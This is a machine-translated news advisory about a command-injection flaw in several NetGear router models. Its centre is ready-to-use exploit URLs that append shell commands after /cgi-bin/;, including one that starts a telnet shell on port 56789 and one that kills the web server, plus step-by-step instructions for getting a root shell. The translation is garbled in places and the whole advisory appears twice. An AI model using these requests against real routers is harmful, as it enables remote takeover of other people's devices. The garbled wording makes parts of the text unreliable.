NetGear routers are vulnerable
In some models of NetGear routers , serious recognizability was detected , which allows attackers to remotely execute Linux commands on devices. To exploit the vulnerability, attackers can use a specially crafted request to the router and send it through a pre-prepared web page.
Vulnerability is quite simple to use, the following command can be used for this.
That is, it is enough to specify the path to the cgi-bin directory on the router and put a semicolon after it, and then specify the commands required for execution. For example,
')
http: // [router-address] / cgi-bin /; uname $ IFS-a - to display information about the router
http: // [router-address] / cgi-bin /; telnetd $ IFS-p $ IFS'56789 - to start the telnet server
http: // [router-address] / cgi-bin /; killall $ IFS'httpd '- terminate the web server process.
The following models of NetGear routers are subject to this vulnerability.
To check the router's vulnerability, you can use the following instructions (Windows).
1. Type in the web browser http: // [router_IP] / cgi-bin /; telnetd $ IFS-p $ IFS'56789 ′, substituting the router's IP address of the router instead of router_IP.
2. Run the command prompt (Win + R> cmd).
3. Type the following command telnet [router_IP] 56789 on the command line, substituting the router's IP address instead of router_IP.
4. In the case of a router's vulnerability, i.e., if the first command was successfully executed on it, you will receive the welcome screen of the router's command shell. In the event that an error message is displayed, the firmware of the router is not vulnerable.
5. In case of successful execution of the first command, the server process must be terminated. To do this, display a list of all processes and select from it the necessary command ps | grep telnet .
6. Then you need to execute the kill <process_id> command, at the same time replacing the process_id with the identifier of the telnet process that was received after the previous command was executed.
Users of vulnerable versions of routers should wait for the release of the corresponding patch and install it.
be secure.
NETGEAR has recently become a # 582384 that allows you to access the command-line interface. A remote attacker can be essentially inject.
Vulnerability is quite simple to use, the following command can be used for this.
http://[router_IP]/cgi-bin/;COMMAND That is, it is enough to specify the path to the cgi-bin directory on the router and put a semicolon after it, and then specify the commands required for execution. For example,
')
http: // [router-address] / cgi-bin /; uname $ IFS-a - to display information about the router
http: // [router-address] / cgi-bin /; telnetd $ IFS-p $ IFS'56789 - to start the telnet server
http: // [router-address] / cgi-bin /; killall $ IFS'httpd '- terminate the web server process.
The following models of NetGear routers are subject to this vulnerability.
NetGear AC1750-Smart WiFi Router (Model R6400)
NetGear AC1900-Nighthawk Smart WiFi Router (Model R7000)
NetGear AC2300-Nighthawk Smart WiFi Router with MU-MIMO (Model R7000P)
NetGear AC2350-Nighthawk X4 AC 2350 Dual Band WiFi Router (Model R7500)
NetGear AC2600-Nighthawk X4S Smart WiFi Gaming Router (Model R7800)
NetGear AC3200-Nighthawk AC3200 Tri-Band WiFi Router (Model R8000)
NetGear AC5300-AC5300 Nighthawk X8 Tri-Band WiFi Router (Model R8500)
NetGear AD7200-Nighthawk X10 Smart WiFi Router (R9000)
To check the router's vulnerability, you can use the following instructions (Windows).
1. Type in the web browser http: // [router_IP] / cgi-bin /; telnetd $ IFS-p $ IFS'56789 ′, substituting the router's IP address of the router instead of router_IP.
2. Run the command prompt (Win + R> cmd).
3. Type the following command telnet [router_IP] 56789 on the command line, substituting the router's IP address instead of router_IP.
4. In the case of a router's vulnerability, i.e., if the first command was successfully executed on it, you will receive the welcome screen of the router's command shell. In the event that an error message is displayed, the firmware of the router is not vulnerable.
5. In case of successful execution of the first command, the server process must be terminated. To do this, display a list of all processes and select from it the necessary command ps | grep telnet .
6. Then you need to execute the kill <process_id> command, at the same time replacing the process_id with the identifier of the telnet process that was received after the previous command was executed.
Users of vulnerable versions of routers should wait for the release of the corresponding patch and install it.
be secure.
Source: https://habr.com/ru/post/317420/
All Articles